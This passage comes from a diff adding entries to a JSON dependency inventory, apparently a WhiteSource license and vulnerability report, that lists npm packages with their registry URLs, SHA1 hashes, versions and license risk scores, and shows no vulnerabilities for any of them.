"vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7a9c3b16-fc47-4efb-bb85-8ab68bbcff6f", + "keyId": 27514108, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/command-exists/-/command-exists-1.2.8.tgz", + "homePage": "https://github.com/mathisonian/command-exists", + "genericPackageIndex": "https://www.npmjs.org/package/command-exists" + }, + "matchType": "SHA1", + "sha1": "715acefdd1223b9c9b37110a149c6392c2852291", + "name": "command-exists-1.2.8.tgz", + "artifactId": "command-exists-1.2.8.tgz", + "version": "1.2.8", + "groupId": "command-exists", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/command-exists" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "725c97b7-34a7-4eec-93d5-71e423093843", + "keyId": 27772483, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/cli-spinners/-/cli-spinners-2.2.0.tgz", + "homePage": "https://github.com/sindresorhus/cli-spinners#readme", + "genericPackageIndex": "https://www.npmjs.org/package/cli-spinners" + }, + "matchType": "SHA1", + "sha1": "e8b988d9206c692302d8ee834e7a85c0144d8f77", + "name": "cli-spinners-2.2.0.tgz", + "artifactId": "cli-spinners-2.2.0.tgz", + "version": "2.2.0", + "groupId": "cli-spinners", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/37e6d9a5-c200-4ac6-9236-0489e76ce74e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e0c0cd7b-9186-4a6d-a155-9d708e5a72db", + "keyId": 27045124, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/hoopy/-/hoopy-0.1.4.tgz", + "homePage": "https://gitlab.com/philbooth/hoopy#readme", + "genericPackageIndex": "https://www.npmjs.org/package/hoopy" + }, + "matchType": "SHA1", + "sha1": "609207d661100033a9a9402ad3dea677381c1b1d", + "name": "hoopy-0.1.4.tgz", + "artifactId": "hoopy-0.1.4.tgz", + "version": "0.1.4", + "groupId": "hoopy", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3f0ea372-96e1-4192-b4b9-8e51ac97c94d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "33f8aef0-615f-4e25-80f0-88a4e0b2dc63", + "keyId": 26948573, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/defaults/-/defaults-1.0.3.tgz", + "homePage": "https://github.com/tmpvar/defaults#readme", + "genericPackageIndex": "https://www.npmjs.org/package/defaults" + }, + "matchType": "SHA1", + "sha1": "c656051e9817d9ff08ed881477f3fe4019f3ef7d", + "name": "defaults-1.0.3.tgz", + "artifactId": "defaults-1.0.3.tgz", + "version": "1.0.3", + "groupId": "defaults", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/defaults/v/1.0.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "471f1fbf-21ce-4c2b-8a49-bff43f458946", + "keyId": 26954864, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-plain-obj/-/is-plain-obj-1.1.0.tgz", + "homePage": "https://github.com/sindresorhus/is-plain-obj", + "genericPackageIndex": "https://www.npmjs.org/package/is-plain-obj" + }, + "matchType": "SHA1", + "sha1": "71a50c8429dfca773c92a390a4a03b39fcd51d3e", + "name": "is-plain-obj-1.1.0.tgz", + "artifactId": "is-plain-obj-1.1.0.tgz", + "version": "1.1.0", + "groupId": "is-plain-obj", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e7c75a4c-c21c-48d3-8757-db526c49a11f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "90f55e3a-1d67-4a24-a941-b75347f6e695", + "keyId": 27531461, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/pkg-up/-/pkg-up-3.1.0.tgz", + "homePage": "https://github.com/sindresorhus/pkg-up#readme", + "genericPackageIndex": "https://www.npmjs.org/package/pkg-up" + }, + "matchType": "SHA1", + "sha1": "100ec235cc150e4fd42519412596a28512a0def5", + "name": "pkg-up-3.1.0.tgz", + "artifactId": "pkg-up-3.1.0.tgz", + "version": "3.1.0", + "groupId": "pkg-up", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e4b6f1ab-afae-48bf-955c-ca8236cce8ac" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "01ae2f65-6383-49a1-b311-103ae274f2b6", + "keyId": 27045132, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/check-types/-/check-types-7.4.0.tgz", + "homePage": "https://gitlab.com/philbooth/check-types.js", + "genericPackageIndex": "https://www.npmjs.org/package/check-types" + }, + "matchType": "SHA1", + "sha1": "0378ec1b9616ec71f774931a3c6516fad8c152f4", + "name": "check-types-7.4.0.tgz", + "artifactId": "check-types-7.4.0.tgz", + "version": "7.4.0", + "groupId": "check-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1bdd2c19-dc4d-4cf9-88c6-49f5245f9681" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2a254100-6624-4f73-8b22-60ba5b36a5db", + "keyId": 27817085, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-preset-env/-/postcss-preset-env-6.7.0.tgz", + "homePage": "https://github.com/csstools/postcss-preset-env#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-preset-env" + }, + "matchType": "SHA1", + "sha1": "c34ddacf8f902383b35ad1e030f178f4cdf118a5", + "name": "postcss-preset-env-6.7.0.tgz", + "artifactId": "postcss-preset-env-6.7.0.tgz", + "version": "6.7.0", + "groupId": "postcss-preset-env", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9dc7055c-2f08-4ee6-9389-c792fdc0d500" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "70a12e9d-1989-4f1c-9bb2-28557edb829d", + "keyId": 28432191, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-button/-/honeyui-button-1.3.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/button#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-button" + }, + "matchType": "SHA1", + "sha1": "a04919047ee86b7a3bdba2934671cae2e68ecbea", + "name": "honeyui-button-1.3.0.tgz", + "artifactId": "honeyui-button-1.3.0.tgz", + "version": "1.3.0", + "groupId": "@test/honeyui-button", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1207e067-e3e5-4707-8409-4389a5312313", + "keyId": 26948375, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/clone/-/clone-1.0.4.tgz", + "homePage": "https://github.com/pvorb/node-clone#readme", + "genericPackageIndex": "https://www.npmjs.org/package/clone" + }, + "matchType": "SHA1", + "sha1": "da309cc263df15994c688ca902179ca3c7cd7c7e", + "name": "clone-1.0.4.tgz", + "artifactId": "clone-1.0.4.tgz", + "version": "1.0.4", + "groupId": "clone", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/bb5ead5c-59c3-4fa4-94f2-a62e6d9c104d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3f7273ab-86e9-404b-87ba-a3683acd634e", + "keyId": 26961870, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ansicolors/-/ansicolors-0.2.1.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/ansicolors" + }, + "matchType": "SHA1", + "sha1": "be089599097b74a5c9c4a84a0cdbcdb62bd87aef", + "name": "ansicolors-0.2.1.tgz", + "artifactId": "ansicolors-0.2.1.tgz", + "version": "0.2.1", + "groupId": "ansicolors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/dda2a2e0-1cb0-4a0d-be97-2206902bfad7" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "400cc0f3-fa22-45c9-bac9-b38c1a796b19", + "keyId": 27377175, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-custom-media/-/postcss-custom-media-7.0.8.tgz", + "homePage": "https://github.com/postcss/postcss-custom-media#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-custom-media" + }, + "matchType": "SHA1", + "sha1": "fffd13ffeffad73621be5f387076a28b00294e0c", + "name": "postcss-custom-media-7.0.8.tgz", + "artifactId": "postcss-custom-media-7.0.8.tgz", + "version": "7.0.8", + "groupId": "postcss-custom-media", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-custom-media/v/7.0.8" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8b9e1620-da2f-4308-994f-43ec8e556756", + "keyId": 28410293, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/dotenv/-/dotenv-8.2.0.tgz", + "homePage": "https://github.com/motdotla/dotenv#readme", + "genericPackageIndex": "https://www.npmjs.org/package/dotenv" + }, + "matchType": "SHA1", + "sha1": "97e619259ada750eea3e4ea3e26bceea5424b16a", + "name": "dotenv-8.2.0.tgz", + "artifactId": "dotenv-8.2.0.tgz", + "version": "8.2.0", + "groupId": "dotenv", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/aeda4eae-c61f-4541-a2e8-56ef9b14678f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a4f7e8d0-db0b-4849-a5b5-3982ea223e33", + "keyId": 27033065, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/unescape-js/-/unescape-js-1.1.1.tgz", + "homePage": "https://github.com/iamakulov/unescape-js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/unescape-js" + }, + "matchType": "SHA1", + "sha1": "a4345e654b857c29fa66469e311ccaf2e93063bd", + "name": "unescape-js-1.1.1.tgz", + "artifactId": "unescape-js-1.1.1.tgz", + "version": "1.1.1", + "groupId": "unescape-js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/unescape-js/v/1.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "70f32fc0-ca51-4d7f-a70d-4cb57bed4fe4", + "keyId": 26948707, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash._reinterpolate/-/lodash._reinterpolate-3.0.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash._reinterpolate" + }, + "matchType": "SHA1", + "sha1": "0ccf2d89166af03b3663c796538b75ac6e114d9d", + "name": "lodash._reinterpolate-3.0.0.tgz", + "artifactId": "lodash._reinterpolate-3.0.0.tgz", + "version": "3.0.0", + "groupId": "lodash._reinterpolate", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/61745ee4-c942-47ce-84b8-e687fe66678e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e103b617-98d6-4950-962e-eed8bb0e92da", + "keyId": 27242080, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/winston/-/winston-3.2.1.tgz", + "homePage": "https://github.com/winstonjs/winston#readme", + "genericPackageIndex": "https://www.npmjs.org/package/winston" + }, + "matchType": "SHA1", + "sha1": "63061377976c73584028be2490a1846055f77f07", + "name": "winston-3.2.1.tgz", + "artifactId": "winston-3.2.1.tgz", + "version": "3.2.1", + "groupId": "winston", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9bce2776-c740-497f-b0a0-e65c7ed88e55" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4cafb9bd-0722-479b-baf2-97719aae4562", + "keyId": 27373781, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/int64-buffer/-/int64-buffer-0.1.10.tgz", + "homePage": "https://github.com/kawanet/int64-buffer", + "genericPackageIndex": "https://www.npmjs.org/package/int64-buffer" + }, + "matchType": "SHA1", + "sha1": "277b228a87d95ad777d07c13832022406a473423", + "name": "int64-buffer-0.1.10.tgz", + "artifactId": "int64-buffer-0.1.10.tgz", + "version": "0.1.10", + "groupId": "int64-buffer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/int64-buffer" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "91e17d88-7e68-493d-85e6-a048f032594c", + "keyId": 27100332, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-lab-function/-/postcss-lab-function-2.0.1.tgz", + "homePage": "https://github.com/jonathantneal/postcss-lab-function#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-lab-function" + }, + "matchType": "SHA1", + "sha1": "bb51a6856cd12289ab4ae20db1e3821ef13d7d2e", + "name": "postcss-lab-function-2.0.1.tgz", + "artifactId": "postcss-lab-function-2.0.1.tgz", + "version": "2.0.1", + "groupId": "postcss-lab-function", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-lab-function" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "cb6f6582-abd5-4d68-b2e1-8e0c6771e422", + "keyId": 28432203, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-navbar/-/honeyui-navbar-1.3.0.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/navbar#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-navbar" + }, + "matchType": "SHA1", + "sha1": "da20aad6ba48ee7b7ed766fb31c316c79ae8a7bb", + "name": "honeyui-navbar-1.3.0.tgz", + "artifactId": "honeyui-navbar-1.3.0.tgz", + "version": "1.3.0", + "groupId": "@test/honeyui-navbar", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e703cf3d-e867-42f2-a3eb-937097d58215", + "keyId": 26965455, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/module-details-from-path/-/module-details-from-path-1.0.3.tgz", + "homePage": "https://github.com/watson/module-details-from-path#readme", + "genericPackageIndex": "https://www.npmjs.org/package/module-details-from-path" + }, + "matchType": "SHA1", + "sha1": "114c949673e2a8a35e9d35788527aa37b679da2b", + "name": "module-details-from-path-1.0.3.tgz", + "artifactId": "module-details-from-path-1.0.3.tgz", + "version": "1.0.3", + "groupId": "module-details-from-path", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d621f029-04ef-4ede-976a-ac5ed66f06a8" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "daf72b91-d81e-46af-bf46-a8e75af9e57d", + "keyId": 27083655, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/isemail/-/isemail-3.2.0.tgz", + "homePage": "https://github.com/hapijs/isemail#readme", + "genericPackageIndex": "https://www.npmjs.org/package/isemail" + }, + "matchType": "SHA1", + "sha1": "59310a021931a9fb06bbb51e155ce0b3f236832c", + "name": "isemail-3.2.0.tgz", + "artifactId": "isemail-3.2.0.tgz", + "version": "3.2.0", + "groupId": "isemail", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ae3f2585-5810-4e40-a06e-901493c8adef" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8f8eac29-ba22-4a0c-a795-15edd254ab96", + "keyId": 28291506, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-buffer/-/is-buffer-2.0.4.tgz", + "homePage": "https://github.com/feross/is-buffer#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-buffer" + }, + "matchType": "SHA1", + "sha1": "3e572f23c8411a5cfd9557c849e3665e0b290623", + "name": "is-buffer-2.0.4.tgz", + "artifactId": "is-buffer-2.0.4.tgz", + "version": "2.0.4", + "groupId": "is-buffer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/bda6b80f-a8d0-4768-b764-c625fbbfbcd9" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "fab403e0-c53f-4750-9c43-fde1e61654b3", + "keyId": 28432152, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/emojic/-/emojic-1.1.15.tgz", + "homePage": "https://github.com/IonicaBizau/emojic#readme", + "genericPackageIndex": "https://www.npmjs.org/package/emojic" + }, + "matchType": "SHA1", + "sha1": "b93862ba56d013366f24635b2e2e36d5f3f9ae81", + "name": "emojic-1.1.15.tgz", + "artifactId": "emojic-1.1.15.tgz", + "version": "1.1.15", + "groupId": "emojic", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7d30e661-f676-4e57-9edc-3090fe3fff57" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "0a53a78b-f722-4f92-ae59-db75b1e589e1", + "keyId": 27325139, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", + "homePage": "https://github.com/sindresorhus/camelcase#readme", + "genericPackageIndex": "https://www.npmjs.org/package/camelcase" + }, + "matchType": "SHA1", + "sha1": "e3c9b31569e106811df242f715725a1f4c494320", + "name": "camelcase-5.3.1.tgz", + "artifactId": "camelcase-5.3.1.tgz", + "version": "5.3.1", + "groupId": "camelcase", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1c9e5912-9f2b-41d2-b13c-258831099e4c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2e47050a-958e-4fb8-afa5-cfd837384e77", + "keyId": 27253215, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.0.2.tgz", + "homePage": "https://github.com/postcss/postcss-selector-parser", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-selector-parser" + }, + "matchType": "SHA1", + "sha1": "934cf799d016c83411859e09dcecade01286ec5c", + "name": "postcss-selector-parser-6.0.2.tgz", + "artifactId": "postcss-selector-parser-6.0.2.tgz", + "version": "6.0.2", + "groupId": "postcss-selector-parser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/88187bdf-d613-4bb6-bbf5-f8dad806ba99" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e0b624d7-17e0-459d-b4c5-ce67f73043c7", + "keyId": 28432170, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-progress/-/honeyui-progress-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/progress#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-progress" + }, + "matchType": "SHA1", + "sha1": "5f49b46f6f7fe22158b905810863f6fd987f027a", + "name": "honeyui-progress-1.1.1.tgz", + "artifactId": "honeyui-progress-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-progress", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "15e3bce4-fd78-4c81-96c8-e89ecce7e200", + "keyId": 26969191, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/kuler/-/kuler-1.0.1.tgz", + "homePage": "https://github.com/3rd-Eden/kuler", + "genericPackageIndex": "https://www.npmjs.org/package/kuler" + }, + "matchType": "SHA1", + "sha1": "ef7c784f36c9fb6e16dd3150d152677b2b0228a6", + "name": "kuler-1.0.1.tgz", + "artifactId": "kuler-1.0.1.tgz", + "version": "1.0.1", + "groupId": "kuler", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/kuler" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d8871374-4d40-436e-9894-1f1d8271487f", + "keyId": 27139273, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/esprima/-/esprima-3.0.0.tgz", + "homePage": "http://esprima.org", + "genericPackageIndex": "https://www.npmjs.org/package/esprima" + }, + "matchType": "SHA1", + "sha1": "53cf247acda77313e551c3aa2e73342d3fb4f7d9", + "name": "esprima-3.0.0.tgz", + "artifactId": "esprima-3.0.0.tgz", + "version": "3.0.0", + "groupId": "esprima", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/esprima" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a0c7eb61-821c-41a9-b829-c055cf77377e", + "keyId": 26955802, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/log-symbols/-/log-symbols-2.2.0.tgz", + "homePage": "https://github.com/sindresorhus/log-symbols#readme", + "genericPackageIndex": "https://www.npmjs.org/package/log-symbols" + }, + "matchType": "SHA1", + "sha1": "5740e1c5d6f0dfda4ad9323b5332107ef6b4c40a", + "name": "log-symbols-2.2.0.tgz", + "artifactId": "log-symbols-2.2.0.tgz", + "version": "2.2.0", + "groupId": "log-symbols", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4bf4bf41-88b3-4ec0-9351-32407de55732" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "5de1edd1-4a14-4d30-969f-1ae80af1b914", + "keyId": 28292908, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "homePage": "https://github.com/isaacs/yallist#readme", + "genericPackageIndex": "https://www.npmjs.org/package/yallist" + }, + "matchType": "SHA1", + "sha1": "dbb7daf9bfd8bac9ab45ebf602b8cbad0d5d08fd", + "name": "yallist-3.1.1.tgz", + 